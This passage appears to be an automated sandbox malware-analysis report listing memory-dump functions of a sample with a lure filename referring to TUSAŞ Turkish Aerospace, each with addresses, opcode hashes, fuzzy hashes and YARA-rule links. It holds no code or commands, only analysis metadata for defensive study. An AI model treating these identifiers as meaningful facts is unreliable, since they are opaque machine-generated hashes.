Instruction ID: 02aae927ffa13a4f2c6f83068479ff097d15680ba45b325364228bba34305b26
Opcode Fuzzy Hash: 27bbb8b6bf951d37d03c0b45c54785ca18bb36145d5a81c7547c70d8ea82e817
Instruction Fuzzy Hash: 441299358E12529FD6512F72EABC13A7A61FB5F7237C8AC40F18FD08559B7104E88B62

Function 02E20C97 Relevance: .5, Instructions: 541COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.3383236440.0000000002E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2e20000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8cb6646de4162b93aaad3b73785a8c031bfe001868e5f678f4d517def9e048ff
Instruction ID: e22781fb66005468054f9afb86ca0f3f92953dd353880a706bf419eca405a264
Opcode Fuzzy Hash: 8cb6646de4162b93aaad3b73785a8c031bfe001868e5f678f4d517def9e048ff
Instruction Fuzzy Hash: 4452C574E00219CFDB54EF64E984A9DBBB2FB88301F1095A9D409B7355DB386E81DF82

Function 02E20CA0 Relevance: .5, Instructions: 539COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.3383236440.0000000002E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2e20000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 106f7eec65a43171ddda0a6c45b8da0754a117d988de33c395fc9af0e59f5bf9
Instruction ID: 63c9be13574b460e1acad60627e6c8066c0c45ba2eabf2c6de644eca3e2879a4
Opcode Fuzzy Hash: 106f7eec65a43171ddda0a6c45b8da0754a117d988de33c395fc9af0e59f5bf9
Instruction Fuzzy Hash: C252C574E00219CFDB54EF64E984A9DBBB2FB88301F1095A9D409B7355DB386E81DF82

Function 02E27701 Relevance: .4, Instructions: 444COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.3383236440.0000000002E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2e20000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9d76506e6f89bc6b056fc558c99ce85332046de542eb4ef35c3ebb4daeb20c54
Instruction ID: a74110f63e513950654b080c39afb2b9c490a3b5659f177b9648207da97dd11a
Opcode Fuzzy Hash: 9d76506e6f89bc6b056fc558c99ce85332046de542eb4ef35c3ebb4daeb20c54
Instruction Fuzzy Hash: 32126030A40215DFDB14DF69C894AAEFBF2FF88318F149559E8469B261DB30ED45CB50

Function 02E2A4E0 Relevance: .4, Instructions: 435COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.3383236440.0000000002E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2e20000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c82cd9167663582c09ab85548361b66aa1aa75088471e953ddc8f155c20dad8c
Instruction ID: 5d2c1495fb92973861839f9ad4bd510650f93cab7561647897c9ffc9b4a1851d
Opcode Fuzzy Hash: c82cd9167663582c09ab85548361b66aa1aa75088471e953ddc8f155c20dad8c
Instruction Fuzzy Hash: AE024C71A80119DFCF14CFA8C984AAEB7B2BF88304F15D569E406AB3A5D730ED85CB51

Function 02E25F38 Relevance: .3, Instructions: 325COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.3383236440.0000000002E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2e20000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0d15b08009bc457c924f405f664d617148ca1240334a9d90f3e05a4946a3e590
Instruction ID: 4e08262904bf0dc98501daafc2f2a5aa68712241e3055174b75aef518139ad0e
Opcode Fuzzy Hash: 0d15b08009bc457c924f405f664d617148ca1240334a9d90f3e05a4946a3e590
Instruction Fuzzy Hash: 54B1EE31B842218FDB159B35C854B7A7BE6AFC8314F149A69E44BCB391DB34DC4AC790

Function 02E2A0F8 Relevance: .2, Instructions: 215COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.3383236440.0000000002E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2e20000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1db067107bc1e351b325fb7e6c82ea606d77b2cc173cf1bec2722f5831c2c37d
Instruction ID: df5e79dbfbb38c693b4552b97b088d967412a0e01f960c02a22cd75286728e98
Opcode Fuzzy Hash: 1db067107bc1e351b325fb7e6c82ea606d77b2cc173cf1bec2722f5831c2c37d
Instruction Fuzzy Hash: 5491BA75A00669CFCB15CF94C8449DEBBF2FF89310F10C56AE84AAB321D731A959CB50

Function 02E280D8 Relevance: .2, Instructions: 201COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.3383236440.0000000002E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2e20000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bc9330d7f40e82fb0ae7f0d686a8600dffeeeb1ff3de261caebd2086731b04fb
Instruction ID: c04ce60487fa0800b15e295433c92b7033ea3507c22f683665dee672ec1be0bd
Opcode Fuzzy Hash: bc9330d7f40e82fb0ae7f0d686a8600dffeeeb1ff3de261caebd2086731b04fb
Instruction Fuzzy Hash: 01718E357806258FCB14CF29C894AAE7BE5BF49708B1594A9E80BDB3B1DB70DC45CB60

Function 02E26498 Relevance: .2, Instructions: 197COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.3383236440.0000000002E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2e20000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b93a2ebf89c85c102c13d4517048f4c9ea4306e3239446ce46234908be42c6ce
Instruction ID: dd100e8f7df41a344046268e44d1fabf37849e7ca7311e285d477b771a8743db
Opcode Fuzzy Hash: b93a2ebf89c85c102c13d4517048f4c9ea4306e3239446ce46234908be42c6ce
Instruction Fuzzy Hash: 3771A770A80525CFCB14CF69C4889A9BBBABF89308F14E669D507D7364D731E849CF51

Function 02E25362 Relevance: .2, Instructions: 163COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.3383236440.0000000002E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2e20000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 82e54a523999aab9953436deae77bd3eb42dd8a5e234932a429b20b3e85fc9da
Instruction ID: a960dede7c5d6658474c5f7c173b42d4358bb9223e2a71661a9b608c87fa2568
Opcode Fuzzy Hash: 82e54a523999aab9953436deae77bd3eb42dd8a5e234932a429b20b3e85fc9da
Instruction Fuzzy Hash: C371D074E40228CFDB18DFA9D984A9DBBF2BF49304F109069E40AAB365DB349985CF50

Function 02E2F3FF Relevance: .1, Instructions: 147COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.3383236440.0000000002E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2e20000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 00b88ccfa4a370739fe49ac6d603cae345aaa28308243770dfa5d1bf0758bb64
Instruction ID: 372f9685528c16aef7627f5a4beeb341c2627ee33222c4dae5ec803a592f8d0f
Opcode Fuzzy Hash: 00b88ccfa4a370739fe49ac6d603cae345aaa28308243770dfa5d1bf0758bb64
Instruction Fuzzy Hash: 98510034D01219CFDB14DFA5D854AAEBBB2FF88300F609529D80AAB395DB795946CF40

Function 02E2D559 Relevance: .1, Instructions: 132COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.3383236440.0000000002E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2e20000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 556706342532d69ad2f6b8e476892b9aa469df44931a45a0013b3a24b19879a4
Instruction ID: 5c2643e7006fb6cc6705bb0f573936758754554f3fc2d662968b058a125155b8
Opcode Fuzzy Hash: 556706342532d69ad2f6b8e476892b9aa469df44931a45a0013b3a24b19879a4
Instruction Fuzzy Hash: 7C518374E01218DFDB54DFA9D58499DBBF2FF89300F249169E809AB364DB309945CF40

Function 02E23CB1 Relevance: .1, Instructions: 117COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.3383236440.0000000002E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2e20000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 56c47c6a289d6ca4dee922d8e130c03d9e2c0271ab667b8190d34213cbf02af4
Instruction ID: 56fe9dfee6118c8b0b8f27de9f306f0111546e79296d1a2e689f8dd2d6c3344b
Opcode Fuzzy Hash: 56c47c6a289d6ca4dee922d8e130c03d9e2c0271ab667b8190d34213cbf02af4
Instruction Fuzzy Hash: 3A313B35B842748BDF18457948942BE6BA6EBC2214F1894BEE807D3381DB7CCC498B61

Function 02E2AF01 Relevance: .1, Instructions: 116COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.3383236440.0000000002E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2e20000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 73b6b6c9daf2fed50227214fe30a60618063908f92479adef79f30f6ad918587
Instruction ID: 8c03b9bd768b051bda2dd1913e002eee8f2ac40ce6a13f7aa7de01a8f8566644
Opcode Fuzzy Hash: 73b6b6c9daf2fed50227214fe30a60618063908f92479adef79f30f6ad918587
Instruction Fuzzy Hash: 7041D131B402149FDB05AB65D814BAEBBF6BFCC610F14846AE91AD73D0DE319C06CB90

Function 02E2AA99 Relevance: .1, Instructions: 109COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.3383236440.0000000002E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2e20000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 82a85f2a45c5e7f61ea8676af97365cd184c5afc9b8c8f64427e7377fa94e8c1
Instruction ID: e7722958da7482ffdc19b8ed0e611d70b711ad24faa37ae0617cb2a2e25d0827
Opcode Fuzzy Hash: 82a85f2a45c5e7f61ea8676af97365cd184c5afc9b8c8f64427e7377fa94e8c1
Instruction Fuzzy Hash: 6E4147746801259FCB15DF28D8A8AAA7BB6FF88314F104469E906DB3A0CB74DC94CB91

Function 02E25658 Relevance: .1, Instructions: 101COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.3383236440.0000000002E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2e20000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1f055b933fd32debc72821825bd2eef5308d154cee5e5f2f6cd1b6c861c4e2be
Instruction ID: d9d401a61b85bf3bba3615a1ccd4dc0bb318ec41e9ee8ca6e37aa1015f026ede
Opcode Fuzzy Hash: 1f055b933fd32debc72821825bd2eef5308d154cee5e5f2f6cd1b6c861c4e2be
Instruction Fuzzy Hash: B631233068111EDFCF09AFA5D944AAF3BA2FB48204F408429F95AD7380CB39CD65DB91

Function 02E29C30 Relevance: .1, Instructions: 101COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.3383236440.0000000002E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2e20000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e2e013dbfe533136895eb8ac60d27007fc6cafb4904b227dece8687c29c783ad
Instruction ID: 7b0027bcaace32eef4ca8fc2779f2dc8392558057600e61846bcd9c69a5d0f2f
Opcode Fuzzy Hash: e2e013dbfe533136895eb8ac60d27007fc6cafb4904b227dece8687c29c783ad
Instruction Fuzzy Hash: 1331A130B40265CFDB00CF58C844BAE7BE6EB89308F64E466E909CB256D771EC45DB61

Function 02E28EF8 Relevance: .1, Instructions: 97COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.3383236440.0000000002E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2e20000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9384c6ac0c8714eb06a7187456163fbabc6267886a6e775496889833670d47e7
Instruction ID: fbe77f7e150c2b8d1d9f9b8cc1270ceec049dbfd7def15da8380d5f90f5f329e
Opcode Fuzzy Hash: 9384c6ac0c8714eb06a7187456163fbabc6267886a6e775496889833670d47e7
Instruction Fuzzy Hash: 7731A6307841298FE725CB2AD85473E7BA7AB84714B14A466E017DB392EF64CC84C775

Function 02E28380 Relevance: .1, Instructions: 87COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.3383236440.0000000002E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2e20000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 70e310d2320c8633c58738df3498073243ae233da5bcfe90301e99f0788457e2
Instruction ID: adda41ad78bf7cc89d9f365a7ea172f1690bdf8df5bb94bf70681b33e714e1c6
Opcode Fuzzy Hash: 70e310d2320c8633c58738df3498073243ae233da5bcfe90301e99f0788457e2
Instruction Fuzzy Hash: 6621F2303802214BDB189A668854B7E3697AFC874CF54E439D547CB398EFB5CC8AD3A1

Function 02E2A3E9 Relevance: .1, Instructions: 85COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.3383236440.0000000002E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2e20000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c7e36bb8e94712c10655407d279a9e4a6f134102ad9ee18d5b5502f46946dce6
Instruction ID: b14d3341e46d8a4c41496b137db511c9090376984bee3aebdfc4a00eadf8db65
Opcode Fuzzy Hash: c7e36bb8e94712c10655407d279a9e4a6f134102ad9ee18d5b5502f46946dce6
Instruction Fuzzy Hash: 7231F831640265CFDB11CF68C848B6ABFB2EF85314F04D5A5D85A9F3A2D370E849CB60

Function 02E228F0 Relevance: .1, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.3383236440.0000000002E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2e20000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c99e9e24249fe2255064e75453003aea79be80d1f4488e2778bfb6eb58e4a20b
Instruction ID: bf72fc460cb9bad9e9d6345e3c169cfe86c2154a32b925f48cb914bf9d247156
Opcode Fuzzy Hash: c99e9e24249fe2255064e75453003aea79be80d1f4488e2778bfb6eb58e4a20b
Instruction Fuzzy Hash: 1221A135A001569FCF14DF24D840AAE77A5EB9D364B50C099ED0AAB340DB35EE46CBD1

Function 02E26300 Relevance: .1, Instructions: 74COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.3383236440.0000000002E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2e20000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 764ab2606d85989e7257270e987045778872fd00a2e0d2342cb813918757f1c1
Instruction ID: 8c465d4136d4af0b891927c79681bd21601b70d8f4dd5509bb5d784221dd6899
Opcode Fuzzy Hash: 764ab2606d85989e7257270e987045778872fd00a2e0d2342cb813918757f1c1
Instruction Fuzzy Hash: 852126357815218FC7259A2AC45452EB3AAFFC57587048578D82BDB394CF30DC05CB80

Function 013AD044 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.3381360091.00000000013AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 013AD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_13ad000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ba9bb7cca1933d83fc045cd366be4a4dfc7ebe48e32451de8964143dae0065ff
Instruction ID: ff6bcfab8172c56386f16829c0dbe4200fdd4910f6bdb22c9e31ddf30068c45d
Opcode Fuzzy Hash: ba9bb7cca1933d83fc045cd366be4a4dfc7ebe48e32451de8964143dae0065ff
Instruction Fuzzy Hash: C92164B1144208EFCB14CF64C9C0B26BB65FB88318F60C56DE94A0BA52C77AD446CB61

Function 02E25649 Relevance: .1, Instructions: 69COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.3383236440.0000000002E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2e20000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d2a0b3ac0c0ffcfa4881e5aff0e83a1f7b8f5cad0341ab4218c780ed86ceefaa
Instruction ID: ca4bb8afc3fdefedec218df7dedc74ae9e4bb703aa718a7d65eba32cd48a6cf4
Opcode Fuzzy Hash: d2a0b3ac0c0ffcfa4881e5aff0e83a1f7b8f5cad0341ab4218c780ed86ceefaa
Instruction Fuzzy Hash: 0321983068614D8FCB18AFA4D8047BF3BA1FB49214F409469E84ACB345CB38CD59CB91

Function 02E24285 Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.3383236440.0000000002E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2e20000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 704283a2aff9df73d6cc6403807f2f4b9e239a388634a2c790e85724c087abd6
Instruction ID: c74d6090a19c381b1c31a50a9c58ffcd6f42e143c64ee1e8d7c81da5eeb89536
Opcode Fuzzy Hash: 704283a2aff9df73d6cc6403807f2f4b9e239a388634a2c790e85724c087abd6
Instruction Fuzzy Hash: A331A674E51248CFCB44DFA8E5948ADBBF6FF49301B209069E809AB364D735AD55CF01

Function 02E29761 Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.3383236440.0000000002E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2e20000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 818e5e73fa7848bef6aa6cd3e3d5f20d099a981c30df30ee58184dec1ac01002
Instruction ID: 3f3cfd72588a42874b26420242cc5b791e29953943e9c3d4bddb248494600dc0
Opcode Fuzzy Hash: 818e5e73fa7848bef6aa6cd3e3d5f20d099a981c30df30ee58184dec1ac01002
Instruction Fuzzy Hash: 4D21AB30E41258DFCB09CFB5D950AEEBFB6EF48208F24A469E406F6291DB34D944CB20

Function 02E262F0 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.3383236440.0000000002E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2e20000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 80a7b9001dd05c080e2cbe297d5de51a13dac7d16db39dd341f609d9ecd24858
Instruction ID: 28115824ef31a6d81b1495537f0dfbb3131b66d01bd58a32d549a0690d9e93fb
Opcode Fuzzy Hash: 80a7b9001dd05c080e2cbe297d5de51a13dac7d16db39dd341f609d9ecd24858
Instruction Fuzzy Hash: 3F11C1317855218FC7169A2AD85453E77A6BFC575930885ADE41BCB3A4CF30CC068790

Function 02E2F320 Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.3383236440.0000000002E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2e20000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a2909b5ed271131804c363a6043e0225ff41884f8eda8ab7b478c9fcd014ac26
Instruction ID: ee15293e93b9078d7c6338900eee01c2d00053c1db66cf010dbb156efe5d0233
Opcode Fuzzy Hash: a2909b5ed271131804c363a6043e0225ff41884f8eda8ab7b478c9fcd014ac26
Instruction Fuzzy Hash: D8110D70D0024ADFEB44EFA8D54069EBFF1FB84304F10D5A9C118AB254EB789E45DB81

Function 013AD03F Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.3381360091.00000000013AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 013AD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_13ad000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 703b7abd3718bd21aa6f36dac6c8dc0e73c65716f16ca45b46755fc1987422b6
Instruction ID: 2a063cea65a5b081e33aa6d9008b068690aeee6b771a6455c53aeb98e7682de6
Opcode Fuzzy Hash: 703b7abd3718bd21aa6f36dac6c8dc0e73c65716f16ca45b46755fc1987422b6
Instruction Fuzzy Hash: 2E11DD75504284CFCB12CF54C9C4B15BFA2FB88318F24C6ADE8494B652C33AD44ACF62

Function 02E227FF Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.3383236440.0000000002E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2e20000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5b75d029ec5611774c8d1fd44a73977299de850ac4ae9f1a1d89aeb668d05f52
Instruction ID: e5c01c129d983f2f3ed834f310c54b55efafdf0649e76aa1b7f603a652d8bfb1
Opcode Fuzzy Hash: 5b75d029ec5611774c8d1fd44a73977299de850ac4ae9f1a1d89aeb668d05f52
Instruction Fuzzy Hash: EA119C74D5020A8FCF44EFA9D9445EEBBF4FF49314F50966AD809B2210EB305A95CFA1

Function 02E2ABD0 Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.3383236440.0000000002E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2e20000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 89499575f1d00a73c833767d633170200485a4283047af62732683c5361e0e93
Instruction ID: 7bbcc5ab29881859f6e9ed5b7ee5796204be279bd5284e71c9b8009620e4469d
Opcode Fuzzy Hash: 89499575f1d00a73c833767d633170200485a4283047af62732683c5361e0e93
Instruction Fuzzy Hash: B601A9317C42204F97169A2ED85466977AAEFC9A59359A07AE40BCB362EB20CC46C740

Function 02E25EA9 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.3383236440.0000000002E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2e20000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 34c7b9e2e2e80246f2820ee68355fc52a5d15e93d11d1224fe4c24e47d05972f
Instruction ID: a24d01f51e0efb730eee632ae1f2b44b8c52a53ec63d6472f82f72c78168a5c9
Opcode Fuzzy Hash: 34c7b9e2e2e80246f2820ee68355fc52a5d15e93d11d1224fe4c24e47d05972f
Instruction Fuzzy Hash: 9501F932B801256BCB05EE959C10AAF3BDBEBC8750F54C029F50AD7284DE75CD1A9790

Function 02E29D59 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.3383236440.0000000002E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2e20000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 607851c92a0443896a0961e2654b5c86ca1e89f3165dfc6b43bc4932682684bd
Instruction ID: fb8f060dcd84e08a2cf964122d3e2b6cf7f4ad3013de3db1ba0802737562b92a
Opcode Fuzzy Hash: 607851c92a0443896a0961e2654b5c86ca1e89f3165dfc6b43bc4932682684bd
Instruction Fuzzy Hash: 5BF0C8363401186FDB185AA69C5097FBBCBEBCC360F149429BA0AC7341DE71CC0197A1

Function 02E2E8F9 Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.3383236440.0000000002E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2e20000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f1f35007120a2a84392463908b49cb2ed28e89c5e7e71d8701e7618b694b2144
Instruction ID: eaabf611321e814249f3f1217bd69a13d20e70ef44cdc624fa43ceca2bdc4720
Opcode Fuzzy Hash: f1f35007120a2a84392463908b49cb2ed28e89c5e7e71d8701e7618b694b2144
Instruction Fuzzy Hash: FA01E874E0020AEFDB00DFA4D484AAEBBB1FB48300F108565D914B3350D7795E55DF91

Function 02E228A3 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

